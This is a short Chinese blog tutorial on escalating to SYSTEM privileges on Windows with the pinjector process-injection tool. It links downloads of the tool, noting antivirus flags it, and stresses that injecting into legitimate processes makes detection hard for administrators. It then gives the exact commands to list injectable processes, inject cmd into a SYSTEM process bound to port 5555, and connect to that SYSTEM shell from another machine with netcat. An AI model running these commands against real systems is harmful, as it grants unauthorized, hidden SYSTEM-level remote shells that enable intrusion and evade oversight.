2. pinjector工具注入进程提权
什么是注入进程提权
叫我的进程注入到system账户里面
或者是叫system账户进程注入到user普通用户里面
管理员非常难发现应为他注入到的是合法进程
下载
要翻墙下载地址http://www.tarasco.org/security/Process_Injector/
下面的就下载下来保持到了蓝奏云上面地址https://wwx.lanzoux.com/iWF2lhyvzre
他会误报有病毒
他有三个文件那那.c和.h是源码文件,还有一个执行文件
他的参数
执行看一下他的参数
他就有两个参数
-l 是查看可以注入的进行-p [PID] [程序的名] [端口]就是注入进程,通过这个端口直接就可以用nc连接
实咧
查看可以注入的进程
命令
1 | pinjector.exe -l |
进行注入到system账户里面
我就随便选一个
命令
1 | pinjector.exe -p 636 cmd 5555 |
636是注入的PIDcmd要注入的程序5555指定的端口
可以看到端口已经开启了
我们就可以在其他电脑上连接上那个提权到system的cmd了
命令
1 | nc -nv 192.168.31.135 5555 |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 ZSSのW啥都学!
![微信]()
微信![支付宝]()
支付宝
评论